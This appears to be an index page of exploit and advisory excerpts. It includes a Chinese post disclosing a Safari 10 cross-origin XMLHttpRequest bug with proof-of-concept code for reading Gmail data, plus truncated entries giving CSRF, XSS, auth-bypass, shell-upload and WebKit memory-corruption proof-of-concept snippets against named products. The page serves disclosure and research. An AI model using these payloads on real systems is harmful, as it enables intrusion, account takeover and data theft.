safari10跨域漏洞

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置httpheader 我交到苹果的bugreport，并给apple发邮件后，他们自己悄悄把漏洞修了，连个邮件都没给我发，所以我决定公开poc 这是我在漏洞未修复前截的图： 这个漏洞可以造成同源策略绕过，随便跨域，这是我写的获取gmail数据的代码： html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...

Student Result or Employee Database <= 1.6.3 - Auth Bypass

The Student Result or Employee Database WordPress plugin was affected by an Auth Bypass security vulnerability. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer:...

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting

Roteador Wireless Intelbras WRN150 - Cross-Site Scripting Exploit Title: XSS persistent on intelbras router with firmware WRN 250 Date: 07/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150Mbps - WRN 240 Tested on: kali linux, windows...

Technicolor TC7337 - SSID Persistent Cross-Site Scripting

Technicolor TC7337 - SSID Persistent Cross-Site Scripting // Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//...

Technicolor TC7337 - SSID Persistent Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications // Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//' //...

Mozilla: Use-after-free and use-after-scope logging XHR header errors (MFSA 2017-16)

A use-after-free and use-after-scope vulnerability when logging errors from headers for XML HTTP Requests XHR. This could result in a potentially exploitable crash. This vulnerability affects Firefox 54, Firefox ESR 52.2, and Thunderbird 52.2...

WebKit - &#039;CachedFrameBase::restore&#039; Universal Cross-Site Scripting

Click anywhere... function createURLdata, type = 'text/html' return URL.createObjectURLnew Blobdata, type: type; function navigatew, url let a = w.document.createElement'a'; a.href = url; a.click; window.onclick = = window.w = open'about:blank', 'w', 'width=500, height=500'; let i0 =...

WebKit CachedFrameBase::restore Universal Cross Site Scripting

WebKit: UXSS via CachedFrameBase::restore This is similar to the case https://bugs.chromium.org/p/project-zero/issues/detail?id=1151. But this time, javascript handlers may be fired in FrameLoader::open. void FrameLoader::openCachedFrameBase& cachedFrame ... cleardocument, true, true,...

WebKit WebCore::toJS Use-After-Free

WebKit: WebCore::toJS use-after-free CVE-2017-2476 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= function freememory var a; forvar i=0;i...

Debian DLA-859-1 : calibre security update

It was found that a JavaScript present in the book can access files on the computer using XMLHttpRequest. For Debian 7 'Wheezy', these problems have been fixed in version 0.8.51+dfsg1-0.1+deb7u1. We recommend that you upgrade your calibre packages. NOTE: Tenable Network Security has extracted the...

Files.com: CSRF @ configuration

Enter the support PIN from your test site if applicable: Enter the name of your test site if applicable: gaming2 Enter the subdomain from your test site if applicable: gaming2 Fill in the rest of your report below: ---- Greeting guys , i found a CSRF Bug at the configuration - General form in all...

Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution Arbitrary File Read

Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution Arbitrary File Read / OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open...

Horos 2.1.0 Cross Site Scripting Vulnerability

Exploit for macOS platform in category dos / poc Horos 2.1.0 Web Portal DOM Based XSS Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: HorosaC/ is an open-source, free medical image viewer. The goal of the Horos Project is to develop a fully...

XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery

Exploit Title: CSRF XFINITY Gateway product Technicolorpreviously Cisco DPC3941T Date: 12/12/2016 Exploit Author: Ayushman Dutta Version: dpc3941-P20-18-v303r20421733-160413a-CMCST CVE : CVE-2016-7454 The Device DPC3941T is vulnerable to CSRF and has no security on the entire admin panel for it...

CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload

========================================================================================================= Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF shell.php Author: Besim Google Dork: - Date: 19/10/2016 Type: webapps Platform : PHP Vendor Homepage: - Software Link:...

Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting

Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin Date: 15-10-2016 Software Link: http://www.subrion.org/download/ Vendor: http://www.subrion.org Google Dork: "Powered by Subrion CMS" Exploit Author: Ahsan Tahir Contact: https://twitter.com/AhsanTahirAT |...

ApPHP MicroBlog 1.0.2 Cross Site Request Forgery

Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Author : Besim Google Dork : Date : 12/10/2016 Type : webapps Platform : PHP Vendor Homepage : - Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 CSRF PoC function submitRequest var xhr = new...

phpEnter 4.2.7 Cross Site Request Forgery

function submitRequest var xhr = new XMLHttpRequest; xhr.open"POST", "http://sitename/path/addnews.php", true; xhr.setRequestHeader"Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8"; xhr.setRequestHeader"Accept-Language", "en-US,en;q=0.5"; xhr.setRequestHeader"Content-Type"...

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Author : Besim Google Dork : Date : 12/10/2016 Type : webapps Platform : PHP Vendor Homepage : - Software link :...

ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery Add New Author Author : Besim Google Dork : Date : 12/10/2016 Type : webapps Platform : PHP Vendor Homepage : - Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 CSRF PoC function submitRequest var xhr = new...